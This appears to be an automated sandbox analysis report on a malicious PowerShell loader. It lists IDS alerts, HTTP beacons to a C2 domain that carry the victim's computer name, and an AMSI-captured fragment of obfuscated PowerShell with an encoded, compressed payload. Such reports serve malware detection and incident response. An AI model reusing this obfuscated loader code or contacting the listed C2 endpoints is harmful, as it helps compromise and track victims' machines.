Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000002.00000002.1618129274237.00000226C7F06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1618129274237.00000226C7F06000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1618157720463.00000226E2417000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1618156156751.00000226E2147000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1618159425527.00000226E2548000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1618129274237.00000226C7F06000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618157720463.00000226E245B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1618159960305.00000226E27D7000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: tomation.pdbdb:A source: powershell.exe, 00000002.00000002.1618157720463.00000226E245B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.1618157720463.00000226E24F2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1618157720463.00000226E24F2000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGPG12rsGIjAQRFIZ0JDJaYuVp2FKbxfLNuW7vQg_vU32-Q3mGTboIL6O6lDMyx6BCZTb4ycUzi8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=LwPoOGarXXGj64XXODtAsL4BaaN0zBkYf5R6N2GlGBRXuB3dNBrRlRYfIHivwhc1lJflRbbmyZfoKDpGZv3kzXaNwrVDS397TbXCoTPeH0Vz90ml-ytYRfI80B8xSPEOKd29oYPHmq2EYESC5fcidbTzJgvohHj09fONeCag5hPaTwuju5K5Fy-ippPVkEfYpiA1kA |
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:50041 -> 23.223.194.197:443 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:50038 -> 142.251.35.228:80 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:50036 -> 45.61.136.138:80 |
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:50037 -> 23.223.194.197:443 |
Source: global traffic | HTTP traffic detected: GET /aoter2umlhhtr.php?id=computer&key=39417889290&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGPG12rsGIjAQRFIZ0JDJaYuVp2FKbxfLNuW7vQg_vU32-Q3mGTboIL6O6lDMyx6BCZTb4ycUzi8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=LwPoOGarXXGj64XXODtAsL4BaaN0zBkYf5R6N2GlGBRXuB3dNBrRlRYfIHivwhc1lJflRbbmyZfoKDpGZv3kzXaNwrVDS397TbXCoTPeH0Vz90ml-ytYRfI80B8xSPEOKd29oYPHmq2EYESC5fcidbTzJgvohHj09fONeCag5hPaTwuju5K5Fy-ippPVkEfYpiA1kA |
Source: global traffic | HTTP traffic detected: GET /aoter2umlhhtr.php?id=computer&key=39417889290&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGPG12rsGIjAQRFIZ0JDJaYuVp2FKbxfLNuW7vQg_vU32-Q3mGTboIL6O6lDMyx6BCZTb4ycUzi8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=LwPoOGarXXGj64XXODtAsL4BaaN0zBkYf5R6N2GlGBRXuB3dNBrRlRYfIHivwhc1lJflRbbmyZfoKDpGZv3kzXaNwrVDS397TbXCoTPeH0Vz90ml-ytYRfI80B8xSPEOKd29oYPHmq2EYESC5fcidbTzJgvohHj09fONeCag5hPaTwuju5K5Fy-ippPVkEfYpiA1kA |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618130344286.00000226CB42B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$517l0mrj4gesxkb/$0fhv7ydngks6l12.php? |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618130344286.00000226CB117000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$517l0mrj4gesxkb/$0fhv7ydngks6l12.php?id=$env:computername&key=$ipkyeb&s=527 |
Source: powershell.exe, 00000002.00000002.1618156156751.00000226E2160000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000002.00000002.1618156156751.00000226E2183000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000002.00000002.1618157720463.00000226E24C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.cb |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB06B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618130344286.00000226CB0E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB06B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618156156751.00000226E2160000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527 |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB06B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527p |
Source: powershell.exe, 00000002.00000002.1618148111846.00000226DA079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB0E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618130344286.00000226CB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZnuGPG12rsGIjAQRFIZ0JDJaYuVp2FKbxfLNuW7vQg_vU32-Q3mGTboIL6O6lDMyx6BCZT |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB0E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGPG12rsGIjAQRFIZ0JDJaYuV |
Source: powershell.exe, 00000002.00000002.1618159425527.00000226E2548000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co( |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1618148111846.00000226DA079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1618148111846.00000226DA079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1618148111846.00000226DA079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB0E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CA22A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000002.00000002.1618148111846.00000226DA079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1618130344286.00000226CB0E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618130344286.00000226CB117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1618130344286.00000226CB105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8908:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8908:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $n5vsgrj97qiudhm.((-join (@((8756-8689),(2514-(2612-209)),(-1850+1962),(94380/780),(336672/4008),(3714-(7865349/(-1363+3546))))| ForEach-Object { [char]$_ })))( $necxa6whbyp8vs5 ) $n5vsgrj97qiudhm.((-join (@((3082/46),(1102140/(11999-(-7739+9533))),(994449/(9344-(1995455/5183))),(-6911+(17670390/2515)),(289769/(17498031/6099)))| ForEach-Object { [char]$_ })))()$ti1jyxcwblhf6o7.((-join (@((-6221+(6220+(7824-7756))),(428976/3972),(4217-(10212-(11303-5197))),(76245/663),(6968-(-1970+(141+8696))))| ForEach-Object { [char]$_ })))()[byte[]] $x2c79sbtoqgpjln = $necxa6whbyp8vs5.(([system.String]::new(@((368424/4386),(2949-(16974078/(13721-(6710580/867)))),(242385/3729),(153-39),(-1093+1207),(2128-2031),(1477-1356)))))() $1gdobzkej49sfw3=$x2c79sbtoqgpjln return $1gdobzkej49sfw3}[System.Text.Encoding]::ascii.((-join (@((-8046+8117),(66761/661),(4122-4006),(7725-7642),(-8772+(11137-2249)),(7952-(29721696/3792)),(453810/4322),(8376-8266),(-7151+7254))| ForEach-Object { [char]$_ })))((2160jkensbuqvcxa3pl7diofhr8 "eONmbHV0ZnA8YeX4POdyuwSz+TN4vhlDV54CVrhKkfs8Q37/Xyff7Y1VafIokcrf7z//J/z+yp+mvsfJANEyFTg90BHWj7QXkFHJhgrdzInUtx+VuLPh88rOGZ/BdvfcGhyBpbCpvZfXrmff3BCUhpD3MV8Xr6c8GxGV62I7+UxGn4KyopMBgkoMHofA/p90jBfTkpbfcd/nPOTcnoOr0f4DCb/WfUfdt/WNlrjfwV83pkd/6ANhRVizvDplA2GKi4Qx456c01xb1bpMVKXUchbeR94BxhoMT0n5iW0/qv3vO3AOCkm4X8gsDWrT0M3SexuAmsNgHenj0J77HaE14UDr+6mjBvRKQjaEDbNgvaZKew7oudErc0yHLZHOwhfaoKYBBfFKrOZSDoRVLYSF3flO8CxSsR+4T1G5wfIun933UTu7HfTvsxeRMBHrXh8EGFOShaDvmcjPgbGZ8JOx8ErMXoxAmZKi9BMB0suJ2fenr6BUnIXFw8oSxRoj8s2FPa60C8Zvc+5OTE1Futzb2MewsPNWEfS5xXabKkgwhgNJWo73HXRPAgaSCGtoAibszs9YgBZf/UMvXJ6vDMfXlEvZRby95KCtg9jiztCxNhPXCOPCErPkWKLlxS5S/J8PygxVruF+sR6ZJOb7+CJCVm2C9+v/WZM7LAIfU+FsX78gY/8XlyCXkZq76C+FnJmOopHlVwrJHoPMhJvM2JCMiYyDIqC5JmbCdipqq7dHcu5lqpcQy1ubgqJY9QvtzJxXiiH1sU0BhNcvbvMHAMo5P7uf7nQ6XgsNjFlhWlh7yKtDbRMtWpPYnDTW0QHK5aSvVA4AcfzbzxdwxLT2D0CVric/yyVVE7EQjtSM2x4wNlpUmhjgsYukoae2eYZfPpM3Uxte/VWp3vp9eHcROw+nGezICKe3WNbq5J8phxg9wuJGgP1GAlPdXT17+NDc5BALnO4dGOk/CfGU+JxBXv6XUPpIQFGdpPQtKQSkotUJqFyBlUaW2wSU/gaEE56zDOHeTfRbcznV492paIaBAN+wEoqAhLGrgpXoUIegowuIiqYHnABuLWaFlcLzxYZK5e32sNubFKHl9J51AMV+NML9OTtarpbQHXH5Dw+Wv5SzvT9nXoOCm5Yc+94gVvbAhvEpziU3bBF4O9LIncuaQpr26bBgxAEZHQ2hOHaA00zLkZzzojdUWoqDK4Lq2U2HF8f7LxF83mWgVaSuTFmIQ3LgESFmDQBmBqPyC4UdSjfW9+TUQtGf7IbEEc4CNQaDpEQY/BuDwTPZTlTq+Pyo4QI5w76LCA/Pl6GglAdxEYZqKg5Pnpayt5MRMkmpp5hIfM3Mx3lvpivlmuz2fbI/xQDgJWUFBjoJkfLDKcn+pC5ttSGtPmJqJN |